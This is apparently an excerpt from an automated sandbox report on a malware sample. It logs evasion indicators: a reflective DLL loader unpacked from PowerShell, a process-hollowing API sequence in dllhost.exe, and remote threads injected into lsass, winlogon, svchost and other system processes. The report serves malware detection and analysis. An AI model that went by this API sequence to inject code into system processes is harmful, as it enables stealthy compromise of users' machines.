Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001B94DA9CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_000001B94DA9CD80
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001B94DA984B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_000001B94DA984B0
Source: C:\Windows\System32\svchost.exeCode function: 24_2_0000025202578814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_0000025202578814
Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000252025784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00000252025784B0
Source: C:\Windows\System32\svchost.exeCode function: 24_2_000002520257CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_000002520257CD80
Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000252025A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_00000252025A8814
Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000252025A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00000252025A84B0
Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000252025ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00000252025ACD80
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_000001A9EBFC8814
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFCCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_000001A9EBFCCD80
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_000001A9EBFC84B0
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EC6884B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_000001A9EC6884B0
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EC68CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_000001A9EC68CD80
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EC688814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_000001A9EC688814

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\svchost.exeDomain query: ipwho.is
Source: 35.2.powershell.exe.26c01970000.0.raw.unpack, DLLFromMemory.csReference to suspicious API methods: Win.VirtualAlloc(PtrAdd(pCode, iMAGE_SECTION_HEADER.VirtualAddress), (UIntPtr)sectionAlignment, AllocationType.COMMIT, MemoryProtection.READWRITE)
Source: 35.2.powershell.exe.26c01970000.0.raw.unpack, DLLFromMemory.csReference to suspicious API methods: Win.LoadLibrary(PtrAdd(pCode, iMAGE_IMPORT_DESCRIPTOR.Name))
Source: 35.2.powershell.exe.26c01970000.0.raw.unpack, DLLFromMemory.csReference to suspicious API methods: Win.GetProcAddress(intPtr2, PtrAdd(PtrAdd(pCode, intPtr5), 2))
Source: 35.2.powershell.exe.26c01970000.0.raw.unpack, DLLFromMemory.csReference to suspicious API methods: Win.VirtualProtect(P_0, P_1, P_2, out P_3)
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,7_2_0000000140002434
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: 7D1B2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: 2DD22EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4B8F2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: F20A2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 42AE2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 56A2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 7AD42EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4DA62EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 2542EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: EBF92EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F1602EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 6A172EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 26992EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D5C2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: AB962EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 9B2A2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 84182EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 78732EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5FCF2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 25D92EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A5D82EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F41C2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 25342EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: FC902EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F3532EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 26282EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 31E62EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7D1B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DD22EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4B8F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F1CD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 42AE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 56A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7AD42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4DA62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2542EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EBF92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F1602EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6A172EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26992EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D5C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB962EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B2A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 84182EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 78732EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5FCF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25D92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A5D82EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F41C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25342EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC902EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26282EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 31E62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14342EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 3A3B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: E4192EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\spoolsv.exe EIP: 1452EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 68FA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 951C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 63512EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4E102EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 98582EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3C5C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CFCF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E332EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A2952EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 340C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 53792EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A0E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30B32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 35DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 792F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E9172EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 59542EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1AC02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D2532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 44DD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B00D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B71A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 82022EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 706E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6A4A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15D32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD5E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 570C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E5262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 90B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B1222EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B7A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E4462EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 93252EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 32325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 63CE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0132EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 44F92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30852EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 76162EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 21F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2FD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 16225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15C42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 497C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3DBE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7D1B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DD22EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4B8F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F1DC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 42AE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 56A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7AD42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4DA62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2542EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EBF92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F1602EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6A172EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26992EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D5C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB962EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B2A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 84182EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 78732EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5FCF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 46E42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 47072EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25D92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A5D82EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 557A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F41C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25342EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC902EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26282EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 31E62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14342EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 3A3B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: E4192EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\spoolsv.exe EIP: 1452EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 68FA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 951C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 63512EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4E102EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 98582EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3C5C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CFCF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E332EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A2952EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 340C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 53792EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A0E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30B32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 35DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 792F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E9172EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 59542EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1AC02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D2532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9312EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 44DD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B00D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B71A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 82022EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 706E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6A4A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15D32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD5E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 570C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E5262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 90B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B1222EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B7A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E4462EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 93252EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 32325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 63CE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0132EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 44F92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30852EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 76162EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 21F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2FD25AC
